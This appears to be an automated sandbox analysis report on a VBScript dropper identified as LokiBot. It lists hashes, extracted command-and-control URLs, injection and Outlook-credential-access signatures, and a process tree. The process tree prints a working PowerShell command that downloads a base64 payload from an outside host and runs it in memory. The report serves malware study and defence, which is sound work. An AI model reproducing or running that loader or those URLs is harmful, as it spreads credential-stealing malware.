Analysis
-
max time kernel
132s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system -
submitted
04-10-2022 13:55
Static task
static1
Behavioral task
behavioral1
Sample
DH0238999742.vbs
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
DH0238999742.vbs
Resource
win10v2004-20220901-en
General
-
Target
DH0238999742.vbs
-
Size
437KB
-
MD5
a28574570548d916d36ddfa0ab962548
-
SHA1
6b0da48289ca73aa1732d211544665ca5dcf6a25
-
SHA256
8b54fd4b6fd11853474de7367c7bde98e5472d20c8a04dbd2727f3884734f8ef
-
SHA512
a26bb1cb28ea4c68f9f7a7d96094b41c5dc56ce67ea4abe1ce26857c005c4e0f35a72494e458e4cf4a2aae53910e4b89d20bcf4f09116deef26fa64144930488
-
SSDEEP
48:kklC0eHz7/m7rJv4PsfbuUbNbbldQbWUSS/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldQbAMPKNrY4vvldI
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
lokibot
http://iklok.us/li/UN/cocacola.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
5 | 5048 | powershell.exe
10 | 5048 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | WScript.exe
-
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk | powershell.exe
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | cvtres.exe
Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | cvtres.exe
Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | cvtres.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 5048 set thread context of 1740 | 5048 | powershell.exe | cvtres.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid | process
5048 | powershell.exe
5048 | powershell.exe
1516 | powershell.exe
1516 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 5048 | powershell.exe
Token: SeDebugPrivilege | 1516 | powershell.exe
Token: SeDebugPrivilege | 1740 | cvtres.exe
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
description | pid | process | target process
PID 5008 wrote to memory of 5048 | 5008 | WScript.exe | powershell.exe
PID 5008 wrote to memory of 5048 | 5008 | WScript.exe | powershell.exe
PID 5048 wrote to memory of 1516 | 5048 | powershell.exe | powershell.exe
PID 5048 wrote to memory of 1516 | 5048 | powershell.exe | powershell.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
PID 5048 wrote to memory of 1740 | 5048 | powershell.exe | cvtres.exe
-
outlook_office_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | cvtres.exe
-
outlook_win_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | cvtres.exe
Processes
-
C:\Windows\System32\WScript.exe (depth 1)
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH0238999742.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.efil/tt/681.17.612.581//:ptth'))
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  -
    C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe (depth 3)
    "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    -
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (depth 3)
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 3KB
MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 64B
MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
memory/1516-135-0x0000000000000000-mapping.dmp
-
memory/1516-140-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp
Filesize 10.8MB
-
memory/1516-144-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp
Filesize 10.8MB
-
memory/1740-136-0x0000000000400000-0x00000000004A2000-memory.dmp
Filesize 648KB
-
memory/1740-137-0x00000000004139DE-mapping.dmp
-
memory/1740-139-0x0000000000400000-0x00000000004A2000-memory.dmp
Filesize 648KB
-
memory/1740-145-0x0000000000400000-0x00000000004A2000-memory.dmp
Filesize 648KB
-
memory/1740-146-0x0000000000400000-0x00000000004A2000-memory.dmp
Filesize 648KB
-
memory/5048-132-0x0000000000000000-mapping.dmp
-
memory/5048-141-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp
Filesize 10.8MB
-
memory/5048-134-0x00007FFFC9CB0000-0x00007FFFCA771000-memory.dmp
Filesize 10.8MB
-
memory/5048-133-0x00000248A5660000-0x00000248A5682000-memory.dmp
Filesize 136KB